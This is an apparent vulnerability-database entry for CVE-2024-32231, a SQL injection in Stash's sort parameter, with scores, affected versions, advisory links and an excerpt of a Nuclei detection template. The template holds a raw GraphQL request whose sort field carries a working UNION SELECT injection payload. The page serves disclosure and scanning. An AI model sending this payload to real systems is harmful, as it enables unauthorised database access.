CVE-2024-32231
Published 2024-08-15
CVE-2024-32231: Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
Priority P3 · 47 · medium · 6.3 CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
EXPLOIT
EPSS: 1.18% (63.8th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | stashapp_stash | >= 0 < 0.26.0 | 0.26.0 |
| stashapp | stash | <= 0.25.1 | — |
OSV
SQL injection in github.com/stashapp/stash
osv·2024-08-16
CVE-2024-32231 SQL injection in github.com/stashapp/stash
OSV
SQL injection in github.com/stashapp/stash
osv·2024-08-15
CVE-2024-32231 [CRITICAL] SQL injection in github.com/stashapp/stash
GHSA
SQL injection in github.com/stashapp/stash
ghsa·2024-08-15
CVE-2024-32231 [CRITICAL] CWE-89 SQL injection in github.com/stashapp/stash
No detection rules found.
Nuclei
Stash < 0.26.0 - SQL Injection
nuclei·CVSS 6.3
CVE-2024-32231 [MEDIUM] Stash < 0.26.0 - SQL Injection
```yaml
tags: cve,cve2024,stash,sqli,vuln
http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json

        {"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n findPerformers(\n filter: $filter\n performer_filter: $performer_filter\n performer_ids: $performer_ids\n ) {\n count\n performers {\n ...PerformerData\n __typename\n }\n __typename\n }\n}\n\nfragment PerformerData on Performer {\n id\n name\n disambiguation\n url\n gender\n twitter\n instagram\n birthdat
```
2024-08-15
Published